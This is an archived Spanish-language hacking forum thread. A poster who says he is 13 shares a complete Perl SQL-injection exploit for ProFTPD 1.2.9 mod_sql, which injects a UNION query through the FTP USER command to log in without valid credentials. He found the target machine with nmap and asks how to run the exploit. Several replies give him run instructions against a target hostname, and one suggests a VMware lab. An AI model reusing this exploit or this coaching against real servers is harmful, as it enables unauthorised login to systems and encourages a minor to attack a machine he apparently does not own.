AYUDA VULNERABILIDAD ProFTPD 1.2.9 Server

hola a todos soy nuevo aqui tengo 13 años y me gusta el hacking, primero hize un mapeo con el nmap y encontre una maquina que tiene el puerto 21 abierto y trate de conectarme al ftp desde el cmd y encontre que tiene el ProFTPD 1.2.9 Server y luego encontre este exploit para el ProFTPD 1.2.9 Server pero no se para que sirve se supone que es para explotar una vulnerabilidad pero si lo ejecuto y me aparece otra cosa y no voy a saber que hacer si alguien me pudiera ayudar xfas Undecided

P.D. NO SE SI ESTE BIEN SI ALGUIEN DE USTEDES PUDIERA CORREGIRLO, OTRA CON QUE PROGRAMA LO COMPILO

#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if( @ARGC<2){
print "\nProof Of Concept Sql Inject on ProFTPD\n";
print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

or die "Can't connect. \n";
if(defined($line=<$remote>)){
print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
print "[------- Sql Inject Able \n";
}else{
print "[------- Sql Inject Unable \n";
}
close $remote;

hola

primero, para compilar eso, si estas en windows... tienes ke descargar un compilador de perl... trata de buscar alguno ke se te haga sencillo...

y segundo... sobre el tema de metasploit ke pusiste... la nueva version 3.1 le han cambiado cosas... asi ke tendras ke investigar bien si han habido cambios en los comandos... yo me kede hasta la version 2.5 asi ke no creo poder ayudarte...

tambien podria pasarte ke hayas lanzado el exploit, pero ya esta parchado.. asi ke aunke llegue el exploit talvez ya no funciona...

asi ke si no puedes hacer tal cosa... es porke talvez no se creo ninguna shell... te recomiendo ke instales un virtualizador como VMware y ke instales dos sistemas windows... despues instala la version de apache ke te aparece en el metasploit... y fijate ke pasa.. sino pasa nada.. es porke ya no funciona... pero si te pasa algo diferente.. kiere decir ke algo no esta bien.. o ke incluso la victima logra detener el atake...

espero esto te sirva... nos vemos

Citar

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query..

Perl, Inyecion Sql.
Busca sobre ese lenguaje y sobre esos tipos de bugs,.

POC, son pruebas..

pero prova.
Usage: perl poc-sqlftp <target>

Usage: perl poc-sqlftp www.pagina.com

el problema es el nombre que le distes al exploit.... por ejemplo deberias poner...
cd Desktop (recomendacion en el desktop para que no te muevas a tantos directorios)
perl elnombredelexploit.pl www.idiotas.com

te va a dar la indicacion y nada lo haces nuevamente pero con su nombre si no te sale dale permisos de ejecucion....

pero siempre con el nombre que le diste no el que sale en el exploit...

salu2

Fuck +|-|3 3t|-|ik4l H4c|<iNg

pero acaso no te fijas, preguntaste lo mismo en otro post.
fijate en la extencion, le sakas el .pl.

el mismo tema esta en otro post..
deja de postear doble.

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 24, 2008, 09:11:06 Boton Buscar